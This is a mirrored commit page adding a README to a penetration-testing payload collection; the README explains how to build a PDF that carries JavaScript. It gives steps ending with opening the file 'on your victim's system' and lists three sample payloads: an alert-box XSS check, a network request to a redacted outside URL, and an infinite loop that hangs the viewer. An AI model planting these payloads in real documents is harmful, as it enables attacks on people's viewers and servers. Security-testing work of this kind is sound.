Backup_Repos/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings synced 2025-12-06 17:02:53 +01:00
Code Issues Projects Releases Wiki Activity

Merge pull request #630 from mtausig/patch-2

Browse source 
Add documentation for PDF JS PoC
This commit is contained in:
Swissky 2023-10-10 12:57:44 +02:00 committed by GitHub
commit dd7525dc8f
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 44 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

44
Upload Insecure Files/Extension PDF JS/README.md Normal file
View file

@ -0,0 +1,44 @@
# Generate PDF File Containing JavaScript Code
PDF may contain JavaScript code.
This script allow us to generate a PDF file which helps us to check if that code is executed when the file is opened.
Possible targets are client applications trying to open the file or sererside backends which are parsing the PDF file.
## HowTo
1. Edit the file `poc.js` with the JS code you want to have included in your PDF file
2. Install the required python modules using `pip install pdfrw`
3. Create the PDF: `python poc.py poc.js`
4. Open the file `result.pdf` on your victim's system
## Possible exploit codes
The full set of available functions is documented here: https://opensource.adobe.com/dc-acrobat-sdk-docs/library/jsapiref/JS_API_AcroJS.html
### XSS (for GUI viewers)
```js
app.alert("XSS");
```
### Open URL
```js
var cURL="http://[REDACTED]/";
var params =
{
cVerb: "GET",
cURL: cURL
};
Net.HTTP.request(params);
```
### Timeout
```js
while (true) {}
```
## References
The code is based on https://github.com/osnr/horrifying-pdf-experiments/